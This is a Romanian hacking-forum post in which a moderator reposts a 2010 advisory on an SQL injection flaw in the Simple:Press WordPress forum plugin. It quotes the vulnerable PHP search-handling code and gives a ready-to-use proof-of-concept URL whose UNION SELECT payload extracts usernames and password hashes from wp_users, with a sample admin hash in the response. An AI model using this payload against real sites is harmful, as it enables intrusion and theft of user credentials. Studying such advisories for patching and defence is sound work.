EliteHackers
SALUT 2022!!
NE-AM MUTAT PE DISCORD !
Vrei să inviți un prieten?
[T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r
Acesta aste link-ul oficial al acestui server.
|
Lista Forumurilor Pe Tematici
|
EliteHackers | Reguli | Inregistrare | Login
POZE ELITEHACKERS
Nu sunteti logat.
|
Nou pe simpatie:
simpacurly69
 | Femeie
24 ani
Bucuresti
cauta Barbat
35 - 70 ani |
|
r3v
Moderator
 Inregistrat: acum 16 ani
Postari: 1158
|
|
Code:
# Title: Simple:Press Wordpress Plugin SQL Injection Vulnerability
# Author: ADEO Security
# Published: 03/07/2010
# Version: v4.3.0 (Possible all versions)
# Vendor: http://simple-press.com
# Download: http://simple-press.com/download-manager.php?id=228
# Description: "Simple:Press – the feature rich, completely integrated
and fully scaleable forum plugin for WordPress.
Highly customisable, Simple:Press packs the features of a standalone
forum into a plugin – seamlessly turning your WordPress site into a
community."
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr
# Vulnerability:
In the search field, search values not filtered and inserted into sql
queries without using any quotes/single quotes and Simple:Press
execute this sql queries.
sf-header-forum.php
---[snip]---
385 # Add Search Vars
386 if(isset($_GET['search']))
387 {
388 if($_GET['search'] != '') $sfvars['searchpage'] =
sf_esc_int($_GET['search']);
389 if(isset($_GET['value']) ? $sfvars['searchvalue'] =
stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] =
'');
390 if(isset($_GET['type']) ? $sfvars['searchtype'] =
sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1);
400 if(isset($_GET['include']) ? $sfvars['searchinclude'] =
sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1);
401 if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1;
402 if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1;
403 } else {
---[snip]---
At the line 389, HTTP GET Request "value" defined as global variable
$sfvars['searchvalue'] with filtering functions that stripslashes()
and urldecode() but they can't secure it because in the
sf-database.php file the global variable $sfvar['searchvalue']
inserted into sql query without any quotes/single quotes.
sf-database.php
---[snip]---
...
401 $searchvalue=urldecode($sfvars['searchvalue']);
...
404 if($sfvars['searchtype'] == 6)
...
409 $ANDWHERE = " AND topic_status_flag=".$sfvars['searchvalue']." ";
410
411 } elseif($sfvars['searchtype'] == 8)
...
414 $userid = $sfvars['searchvalue'];
415 $SELECT = "SELECT SQL_CALC_FOUND_ROWS DISTINCT ";
416 $MATCH = "";
417 $ANDWHERE = " AND ".SFPOSTS.".user_id=".$userid." ";
418
419 } elseif($sfvars['searchtype'] == 9)
...
422 $userid = $sfvars['searchvalue'];
...
425 $ANDWHERE = " AND ".SFTOPICS.".user_id=".$userid." ";
...
---[snip]---
Its successfully exploitable with search types 6,8,9. Please see # PoC section.
# PoC:
Request: http://server/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2
Response: Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo.
(0 Matches Found) |
_______________________________________
http://thieves-team.com
r3vyk.info
mess id: doar prin PM datorita faptului ca mi-au dat add 10000 de retardati care joaca metin
|
|
| pus acum 15 ani |
|